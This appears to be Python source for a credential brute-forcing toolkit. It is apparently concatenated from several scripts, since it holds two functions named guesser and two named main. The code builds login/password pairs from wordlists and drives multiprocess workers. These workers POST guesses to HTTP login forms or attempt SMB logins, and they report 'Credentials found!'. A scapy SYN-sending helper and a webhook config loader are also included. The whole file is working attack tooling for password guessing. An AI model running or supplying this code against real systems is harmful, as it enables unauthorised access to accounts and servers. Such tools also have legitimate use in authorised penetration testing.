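def check_config(args, config):
    """Resolve the webhook to report to and the optional user block from config.

    Args:
        args: parsed command-line arguments. Reads ``args.web_hook_url`` (an
            explicit URL, which takes precedence over the config file) and
            ``args.web_hook`` (a hook name from ``config['hook_urls']``, or the
            literal ``'default'`` to use ``config['default_hook']``).
        config: the loaded configuration mapping (may be ``None`` when the
            YAML file was empty).

    Returns:
        ``(nm, job_hook, job_user)``: the hook name (the URL itself when one
        was passed on the command line), the hook URL, and the
        ``instance_info`` block or ``None`` when it is missing.

    Raises:
        SystemExit: with status 1 when no usable hook can be derived from the
            config file; the reason is reported through ``bcolors`` first.
    """
    # Work out what hook is being used and report
    if args.web_hook_url:
        # An explicit URL wins over the config file and doubles as the name.
        job_hook = args.web_hook_url
        nm = job_hook
    else:
        try:
            nm = config['default_hook'] if args.web_hook == 'default' else args.web_hook
            job_hook = config['hook_urls'][nm]
        except (KeyError, TypeError) as e:
            # KeyError: section or hook name absent; TypeError: config is not
            # a mapping (an empty YAML document loads as None).
            bcolors.err("Error parsing webhook from config file:\n{}".format(e))
            bcolors.warn("Exiting")
            raise SystemExit(1)
    # Get user information from config; this section is optional
    try:
        job_user = config['instance_info']
    except (KeyError, TypeError) as e:
        bcolors.err("Error getting User Config:\n{}".format(e))
        bcolors.warn("Continuing without user information")
        job_user = None
    return nm, job_hook, job_user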
def single_crack(bruter, single, single_first, login_q, len_q):
    """Queue ``[login, password]`` pairs built from one wordlist and one fixed value.

    Args:
        bruter: path of the wordlist; read as latin-1, blank lines skipped.
        single: the fixed value paired with every wordlist entry.
        single_first: when true ``single`` is the login and the list holds
            passwords; otherwise the list holds logins and ``single`` is the
            password.
        login_q: queue that receives each ``[login, password]`` list.
        len_q: queue that receives the line count from ``file_len`` once,
            before any pair is queued.

    The whole body sits under a single ``try``: a ``UnicodeDecodeError`` or a
    pipe/connection error is reported and ends the function, so no further
    lines are queued; ``KeyboardInterrupt`` returns silently.  Because latin-1
    decodes every byte value, the decode-error branch is only reachable with
    a different encoding.
    """
    count = 0
    try:
        total = file_len(bruter)
        summary = (
            "Attempting login for 1 user and {} passwords.".format(total)
            if single_first
            else "Attempting login for {} users and 1 password.".format(total)
        )
        bc.info(summary, True)
        len_q.put(total)
        # One pair per non-empty line, in file order
        with open(bruter, 'r', encoding='latin-1') as wordlist:
            for raw in wordlist:
                entry = raw.strip()
                if not entry:
                    continue
                count += 1
                pair = [single, entry] if single_first else [entry, single]
                login_q.put(pair)
    except UnicodeDecodeError as e:
        bc.err("Error decoding on wordlist line {}\n{}.".format(count, e))
        bc.warn("Skipping guess")
    except (BrokenPipeError, ConnectionResetError) as e:
        bc.err("Error communicating between processes : {}".format(e))
        bc.info("Continuing")
    except KeyboardInterrupt:
        return
def double_crack(login_list, password_list, login_q, len_q):
    """Queue every ``[login, password]`` combination of two wordlists.

    Args:
        login_list: path of the login wordlist; read as latin-1, blank lines
            skipped.
        password_list: path of the password wordlist; re-opened and re-read
            for every login, same decoding and skipping rules.
        login_q: queue that receives each ``[login, password]`` list.
        len_q: queue that receives ``file_len(login_list) * file_len(password_list)``
            once, before any pair is queued.

    The whole body sits under a single ``try``: a ``UnicodeDecodeError`` or a
    pipe/connection error is reported and ends the function, so no further
    pairs are queued; ``KeyboardInterrupt`` returns silently.  The password
    counter reported on a decode error is cumulative over all logins.
    """
    users_seen = 0
    passwords_seen = 0  # never reset between logins
    try:
        n_login = file_len(login_list)
        n_pass = file_len(password_list)
        bc.info("Attempting login for {} users and {} passwords.".format(n_login, n_pass), True)
        len_q.put(n_login*n_pass)
        with open(login_list, 'r', encoding='latin-1') as user_file:
            for user_line in user_file:
                user = user_line.strip()
                if not user:
                    continue
                users_seen += 1
                with open(password_list, 'r', encoding='latin-1') as pass_file:
                    for pass_line in pass_file:
                        password = pass_line.strip()
                        if not password:
                            continue
                        passwords_seen += 1
                        login_q.put([user, password])
    except UnicodeDecodeError as e:
        bc.err("Error decoding at login_list line {} & password_list line {}\n{}.".format(users_seen, passwords_seen, e))
        bc.warn("Skipping guess")
    except (BrokenPipeError, ConnectionResetError) as e:
        bc.err("Error communicating between processes : {}".format(e))
        bc.info("Continuing")
    except KeyboardInterrupt:
        return
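def get_config(config_file):
    """Load the YAML configuration file and return the parsed document.

    Args:
        config_file: path of the YAML file to read (decoded as UTF-8).

    Returns:
        The parsed document: a mapping for a normal config, ``None`` for an
        empty file.

    Raises:
        SystemExit: with status 1 when the file cannot be read or decoded or
            is not valid YAML; the error is reported through ``bcolors`` first.
    """
    try:
        with open(config_file, 'r', encoding='utf-8') as y:
            # safe_load builds only standard YAML types (mappings, lists,
            # scalars), which is all a config of names and URLs needs; the
            # full loader additionally resolves Python-specific tags, which a
            # config file should never require.
            config = yaml.safe_load(y)
    except (OSError, UnicodeDecodeError, yaml.YAMLError) as e:
        bcolors.err("Error getting yaml configuration:\n{}".format(e))
        bcolors.warn("Exiting")
        raise SystemExit(1)
    return config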
def send_syn(host, port):
    """Send one TCP SYN to ``host:port`` through scapy's ``sr`` and return its result.

    Args:
        host: destination address for the ``IP`` layer.
        port: destination port for the ``TCP`` layer.

    Returns:
        Whatever ``sr(...)`` returns; the original TODO notes that this is
        not yet reduced to an open/closed verdict.

    Raises:
        SystemExit: any exception while building or sending the packet is
            reported and the process exits.  NOTE(review): the exit status is
            0 even though this is an error path.
    """
    try:
        # Build and send in one go; timeout=0, per the original note, means
        # "send it, no waiting".
        probe = IP(dst=host) / TCP(dport=port, flags='S')
        answer = sr(probe, timeout=0)
    except Exception as e:
        bc.err("Could not send SYN to {}:{} : \n{}".format(host, port, e))
        bc.warn("Check you have permissions to craft packets.")
        bc.err("Exiting.")
        sys.exit(0)
    else:
        # TODO validate Syn response and return 0 open, or 1 for closed/filtered
        return answer
def guesser(url, fmt_str, hdr, login_q, sM, sX, kill_flag, struck_gold, done_q):
    """Worker loop: take ``[login, password]`` pairs from ``login_q`` and POST each one.

    Args:
        url: the form endpoint that receives every POST.
        fmt_str: form-body template with two ``{}`` slots, filled with the
            login and the password in that order.
        hdr: HTTP headers sent with every request.
        login_q: queue of ``[login, password]`` lists filled by the feeder.
        sM: substring whose presence in the response body marks success, or a
            falsy value to disable that check.
        sX: substring whose absence from the response body marks success, or
            a falsy value to disable that check.
        kill_flag: Event polled once per iteration; when set the loop returns.
        struck_gold: Event set when a pair is judged successful.
        done_q: receives one marker per attempt; ``main`` uses its size as the
            progress counter.

    Returns only when ``kill_flag`` is set or on ``KeyboardInterrupt``.
    """
    while True:
        rd = None
        if kill_flag.is_set():
            return
        try:
            rd = login_q.get_nowait()
            if not rd:
                continue #Because sometimes the queue has null in it
            #bc.info("got {} from queue".format(rd))
            # Values are substituted verbatim: no URL-encoding is applied here,
            # so an '&' or '=' inside a credential changes the form body.
            data = fmt_str.format(rd[0], rd[1])
            #bc.info("Sending request.\nurl = {}\ndata = {}\nheaders = {}".format(url, data, hdr))
            r = requests.post(url=url, data=data, headers=hdr)
            #Check success: the match string is present, or the exclude string
            #is absent; each check is skipped when its argument is falsy.
            if (sM and sM in r.text) or (sX and sX not in r.text):
                struck_gold.set()
                bc.success("Credentials found!")
                print("\t[ {} ] = {} [ {} ] = [ {} ]".format(
                    bc.bold_format('User'), bc.green_format(str(rd[0]), ''),
                    bc.bold_format('Password'), bc.green_format(str(rd[1]), '')))
            #Tell main loop we guessed one
            # NOTE(review): the collapsed source does not show whether this line
            # is inside the success branch or, as reconstructed here, after it;
            # only the latter lets main's progress counter reach 100% on a run
            # with no successes.  Attempts that raise below are not counted.
            done_q.put("One more thing tried!")
        except EmptyErr:
            # presumably queue.Empty from get_nowait(); just poll again
            pass
        except BrokenPipeError as e:
            if rd:
                bc.warn("Error when trying credentials : {}\n{}".format(rd, e))
            else:
                pass
        except ConnectionResetError as e:
            if rd:
                bc.warn("Error when trying credentials : {}\n{}".format(rd, e))
            else:
                pass
        except requests.exceptions.ConnectionError as e:
            bc.warn("Couldn't connect when trying credentials : {}\nCheck target host is up if error persists.\n{}".format(rd, e))
        except KeyboardInterrupt:
            return
def guesser(host, domain, port, login_q, timeout, kill_flag, struck_gold, done_q):
    """Worker loop: take ``[login, password]`` pairs from ``login_q`` and try an SMB connect.

    Args:
        host: SMB server address passed to ``SMBConnection.connect``.
        domain: NTLM domain passed to ``SMBConnection``.
        port: SMB port; 445 selects direct-TCP transport, anything else does not.
        login_q: queue of ``[login, password]`` lists filled by the feeder.
        timeout: connect timeout handed to ``SMBConnection.connect``.
        kill_flag: Event polled once per iteration; when set the loop returns.
        struck_gold: Event set when a connect succeeds.
        done_q: receives one marker per attempt (in ``finally``, so failed and
            raising attempts count too); ``main`` uses its size as progress.

    Returns only when ``kill_flag`` is set or on ``KeyboardInterrupt``.
    ``SMBConnection``, ``SMBTimeout`` and ``ProtocolError`` are presumably
    pysmb's; the connection object is never explicitly closed here.
    """
    while True:
        rd = None
        if kill_flag.is_set():
            return
        try:
            rd = login_q.get_nowait()
            if not rd:
                continue #Because sometimes the queue has null in it
            #bc.info("got {} from queue".format(rd))
            direct_tcp = True if port == 445 else False
            #Now try and login
            smb = SMBConnection(username=rd[0], password=rd[1], my_name='', remote_name='', domain=domain, use_ntlm_v2=True, is_direct_tcp=direct_tcp)
            login = smb.connect(host, port, timeout=timeout)
            #Check success
            if login:
                struck_gold.set()
                bc.success("Credentials found!")
                print("\t[ {} ] = {} [ {} ] = [ {} ]".format(
                    bc.bold_format('User'), bc.green_format(str(rd[0]), ''),
                    bc.bold_format('Password'), bc.green_format(str(rd[1]), '')))
                #Tell main loop we guessed one
                #done_q.put("One more thing tried!")
        except EmptyErr:
            # presumably queue.Empty from get_nowait(); just poll again
            pass
        except BrokenPipeError as e:
            if rd:
                print()
                bc.warn("Pipe Error when trying credentials : {}\n{}".format(rd, e))
            else:
                pass
        except SMBTimeout as e:
            if rd:
                print()
                bc.warn("SMB Timeout when trying credentials : {}\n{}".format(rd, e))
            else:
                pass
        except ProtocolError as e:
            if rd:
                print()
                bc.warn("Protocol Error when trying credentials: {}\n{}".format(rd, e))
            else:
                pass
        except KeyboardInterrupt:
            return
        finally:
            #Tell main loop we guessed one if rd; runs on every path out of the
            #try, including the continue for an empty item (rd falsy, no put)
            if rd:
                done_q.put("One more thing tried!")
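def main():
    """Run the SMB brute: start the workers, feed them pairs, show progress.

    Everything comes from ``get_args()``: ``host``, ``domain``, ``port``,
    ``timeout``, ``threads``, the login/password sources that
    ``get_crack_mode`` turns into ``'double'``, ``'user'`` or ``'password'``,
    ``spray`` and ``cont``.  Exits with status 1 when no mode can be derived
    or the mode is unknown, with status 0 otherwise.
    """
    #Setup initial variables
    args = get_args()
    #Get crack mode
    crack_mode = get_crack_mode(args.login_list,
                                args.password_list, args.login, args.password)
    #If there's a bad file provided or some other error in crack_mode derivation
    if not crack_mode:
        raise SystemExit(1)
    #Instantiate workers; the Manager-backed queues are shared with the worker
    #and feeder processes started below
    m = multiprocessing.Manager()
    login_q = m.Queue()
    done_q = m.Queue()
    len_q = m.Queue()
    struck_gold = multiprocessing.Event()
    kill_flag = multiprocessing.Event()
    for _ in range(args.threads):
        worker = multiprocessing.Process(target=guesser, args=(args.host,
            args.domain, args.port, login_q, args.timeout, kill_flag,
            struck_gold, done_q))
        worker.start()
    #Now we have mode, pick the feeder that fills login_q for that mode
    if crack_mode == 'double':
        double_mode = double_crack if not args.spray else spray
        feeder = multiprocessing.Process(target=double_mode, args=(
            args.login_list, args.password_list, login_q, len_q, ))
    elif crack_mode == 'user':
        feeder = multiprocessing.Process(target=single_crack, args=(
            args.login_list, args.password, False, login_q, len_q, ))
    elif crack_mode == 'password':
        feeder = multiprocessing.Process(target=single_crack, args=(
            args.password_list, args.login, True, login_q, len_q, ))
    else:
        bc.err("Brute force mode invalid - {}. Exiting.".format(crack_mode))
        kill_flag.set()
        sleep(0.5)  # presumably so the workers observe kill_flag before exit
        raise SystemExit(1)
    bc.info("Workers initialised. Calculating effort required.")
    #Start the feeder process, reading the lists into the worker queue
    feeder.start()
    #The feeder reports the total number of guesses before queueing any
    n_guesses = len_q.get()
    if not n_guesses:
        #Empty input: nothing to wait for, and the progress division below
        #would divide by zero
        kill_flag.set()
        bc.info("No guesses to make. Shutting down...")
    else:
        done = 0  # keeps the last good reading if qsize() raises
        with progressbar.ProgressBar(max_value=n_guesses) as bar:
            while True:
                try:
                    done = done_q.qsize()
                except Exception as e:
                    bc.warn("Error when checking progress : {}".format(e))
                    bc.info("Continuing")
                progress = round((done / n_guesses) * 100, 0)
                if struck_gold.is_set() and not args.cont:
                    kill_flag.set()
                    bc.info("Creds found, continue flag not set. Finishing.")
                    break
                elif progress >= 100.0 and login_q.empty():
                    kill_flag.set()
                    sleep(1)
                    print()
                    bc.info("Brute complete. Shutting down...")
                    break
                else:
                    #Still running: refresh the bar and poll again
                    bar.update(done)
                    sleep(1)
    #Gracefully kill everything: give each child a short join
    for p in multiprocessing.active_children():
        p.join(0.5)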
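def main():
    """Run the HTTP form brute: start the workers, feed them pairs, show progress.

    Everything comes from ``get_args()``: ``url``, ``user_param``,
    ``pass_param``, optional ``extra_param`` entries appended to the form
    body, ``success_match``/``success_exclude``, ``threads``, the
    login/password sources that ``get_crack_mode`` turns into ``'double'``,
    ``'user'`` or ``'password'``, and ``cont``.  Exits with status 1 when no
    mode can be derived or the mode is unknown, with status 0 otherwise.
    """
    #Setup initial variables
    args = get_args()
    #HTML Request Variables
    #Request data: a template with two '{}' slots that guesser fills with the
    #login and password, in that order
    fmt_str = "{}={}&{}={}".format(args.user_param, "{}", args.pass_param, "{}")
    if args.extra_param:
        for a in args.extra_param:
            # a[0]: presumably each entry is an argparse nargs list — confirm
            # in get_args, since for a plain string this is its first character
            fmt_str = fmt_str + "&{}".format(a[0])
    #Headers; Referer is set to the target URL itself
    hdr = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "en-US,en;q=0.5",
        "Accept-Encoding" : "gzip, deflate",
        "Referer" : args.url,
        "Content-Type" : "application/x-www-form-urlencoded",
        "Connection" : "close",
    }
    #Get crack mode
    crack_mode = get_crack_mode(args.login_list,
                                args.password_list, args.login, args.password)
    #If there's a bad file provided or some other error in crack_mode derivation
    if not crack_mode:
        raise SystemExit(1)
    #Instantiate workers; the Manager-backed queues are shared with the worker
    #and feeder processes started below
    m = multiprocessing.Manager()
    login_q = m.Queue()
    done_q = m.Queue()
    len_q = m.Queue()
    struck_gold = multiprocessing.Event()
    kill_flag = multiprocessing.Event()
    for _ in range(args.threads):
        worker = multiprocessing.Process(target=guesser, args=(args.url, fmt_str, hdr,
            login_q, args.success_match, args.success_exclude,
            kill_flag, struck_gold, done_q))
        worker.start()
    #Now we have mode, pick the feeder that fills login_q for that mode
    if crack_mode == 'double':
        feeder = multiprocessing.Process(target=double_crack, args=(
            args.login_list, args.password_list, login_q, len_q, ))
    elif crack_mode == 'user':
        feeder = multiprocessing.Process(target=single_crack, args=(
            args.login_list, args.password, False, login_q, len_q, ))
    elif crack_mode == 'password':
        feeder = multiprocessing.Process(target=single_crack, args=(
            args.password_list, args.login, True, login_q, len_q, ))
    else:
        bc.err("Brute force mode invalid - {}. Exiting.".format(crack_mode))
        kill_flag.set()
        sleep(0.5)  # presumably so the workers observe kill_flag before exit
        raise SystemExit(1)
    bc.info("Workers initialised. Calculating effort required.")
    #Start the feeder process, reading the lists into the worker queue
    feeder.start()
    #The feeder reports the total number of guesses before queueing any
    n_guesses = len_q.get()
    if not n_guesses:
        #Empty input: nothing to wait for, and the progress division below
        #would divide by zero
        kill_flag.set()
        bc.info("No guesses to make. Shutting down...")
    else:
        done = 0  # keeps the last good reading if qsize() raises
        with progressbar.ProgressBar(max_value=n_guesses) as bar:
            while True:
                try:
                    done = done_q.qsize()
                except Exception as e:
                    bc.warn("Error when checking progress : {}".format(e))
                    bc.info("Continuing")
                progress = round((done / n_guesses) * 100, 0)
                if struck_gold.is_set() and not args.cont:
                    kill_flag.set()
                    bc.info("Creds found, continue flag not set. Finishing.")
                    break
                elif progress >= 100.0 and login_q.empty():
                    kill_flag.set()
                    sleep(1)
                    print()
                    bc.info("Brute complete. Shutting down...")
                    break
                else:
                    #Still running: refresh the bar and poll again
                    bar.update(done)
                    sleep(1)
    #Gracefully kill everything: give each child a short join
    for p in multiprocessing.active_children():
        p.join(0.5)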